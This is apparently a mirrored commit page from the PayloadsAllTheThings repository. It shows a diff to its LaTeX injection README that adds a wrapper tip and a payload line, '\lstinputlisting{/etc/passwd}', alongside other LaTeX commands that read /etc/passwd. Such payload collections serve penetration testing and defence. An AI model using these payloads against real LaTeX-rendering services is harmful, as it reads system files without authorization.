mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-10 12:13:09 -08:00
Merge pull request #652 from clem9669/master
Update README.md for Latex injection
This commit is contained in:
@@ -1,5 +1,7 @@
|
||||
# LaTex Injection
|
||||
|
||||
You might need to adjust injection with wrappers as `\[` or `$`.
|
||||
|
||||
## Read file
|
||||
|
||||
Read file and interpret the LaTeX code in it:
|
||||
@@ -22,6 +24,7 @@ Read single lined file:
|
||||
Read multiple lined file:
|
||||
|
||||
```tex
|
||||
\lstinputlisting{/etc/passwd}
|
||||
\newread\file
|
||||
\openin\file=/etc/passwd
|
||||
\loop\unless\ifeof\file
|
||||
|
||||
Reference in New Issue
Block a user